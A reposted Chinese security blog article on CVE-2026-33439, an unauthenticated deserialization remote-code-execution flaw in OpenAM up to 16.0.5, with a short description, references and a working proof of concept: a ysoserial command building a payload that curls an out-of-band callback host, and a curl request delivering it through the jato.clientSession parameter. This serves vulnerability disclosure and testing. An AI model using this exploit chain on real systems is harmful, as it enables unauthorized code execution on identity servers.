文章总结: CVE-2026-33439是OpenAM身份管理系统的反序列化远程代码执行漏洞,攻击者可通过构造恶意jato.clientSession参数在未授权情况下实现任意代码执行。影响版本为OpenAM≤16.0.5,文档提供了基于ysoserial工具生成Payload的POC示例及验证curl命令。建议用户及时升级至安全版本并参考官方安全公告。 综合评分: 85 文章分类: 漏洞分析,WEB安全,应用安全,渗透测试,红队
CVE-2026-33439|OpenAM反序列化远程代码执行(POC)
alicy alicy
信安百科
2026年4月15日 09:02 河北
在小说阅读器读本章
去阅读
0x00 前言
OpenIdentityPlatform OpenAM是一款基于Java开发的开源访问管理解决方案,以模块化可插拔架构为核心,提供认证、单点登录(SSO)、授权、联合身份认证等全链路身份安全能力。它支持密码、一次性密码(OTP)等多种认证方式,兼容SAML、OAuth2、Kerberos等主流协议,可通过集成OpenIG或策略代理实现灵活的访问控制策略,实现跨域单点登录;
作为企业级身份管理工具,它能无缝对接LDAP、Active Directory等身份数据源,广泛应用于企业内部系统统一管控、B2B集成认证、云服务与移动应用安全接入等场景,遵循CDDL许可证,提供社区与商业双重支持选项,帮助组织构建安全高效的数字身份管理体系。
0x01 漏洞描述
漏洞源于组件在使用JATO框架处理jato.clientSession HTTP参数时,直接对用户输入的字节流进行了Java反序列化处理,且未应用此前针对jato.pageSession参数设置的白名单(WhitelistObjectInputStream)防护措施。
未经身份验证的远程攻击者通过向包含
0x02 CVE编号
CVE-2026-33439
0x03 影响版本
OpenAM<=16.0.5
0x04 漏洞详情
POC:
java --add-opens java.base/java.util=ALL-UNNAMED \ --add-opens java.base/java.lang.reflect=ALL-UNNAMED \ -jar ysoserial-all.jar OpenAM1 \ "curl http://YOUR-COLLABORATOR-ID.oastify.com" > payload.bin
PAYLOAD=$(base64 < payload.bin | tr -d '\n' | tr '+/' '-_' | tr -d '=')
curl -k "https://TARGET/openam/ui/PWResetUserValidation?jato.clientSession=${PAYLOAD}"
0x05 参考链接
https://github.com/OpenIdentityPlatform/OpenAM/security/advisories/GHSA-2cqq-rpvq-g5qj
https://github.com/OpenIdentityPlatform/OpenAM/releases
推荐阅读:
CVE-2026-31938|jsPDF存在HTML注入漏洞(POC)
CVE-2026-24061|Telnetd存在远程认证绕过漏洞(POC)
CVE-2025-61686|React Router未授权目录遍历漏洞(POC)
Ps:国内外安全热点分享,欢迎大家分享、转载,请保证文章的完整性。文章中出现敏感信息和侵权内容,请联系作者删除信息。信息安全任重道远,感谢您的支持!!!
本公众号的文章及工具仅提供学习参考,由于传播、利用此文档提供的信息而造成任何直接或间接的后果及损害,均由使用者本人负责,本公众号及文章作者不为此承担任何责任。
免责声明:
本文所载程序、技术方法仅面向合法合规的安全研究与教学场景,旨在提升网络安全防护能力,具有明确的技术研究属性。
任何单位或个人未经授权,将本文内容用于攻击、破坏等非法用途的,由此引发的全部法律责任、民事赔偿及连带责任,均由行为人独立承担,本站不承担任何连带责任。
本站内容均为技术交流与知识分享目的发布,若存在版权侵权或其他异议,请通过邮件联系处理,具体联系方式可点击页面上方的联系我。
本文转载自:信安百科 alicy alicy《CVE-2026-33439|OpenAM反序列化远程代码执行(POC)》
版权声明
本站仅做备份收录,仅供研究与教学参考之用。
读者将信息用于其他用途的,全部法律及连带责任由读者自行承担,本站不承担任何责任。
评论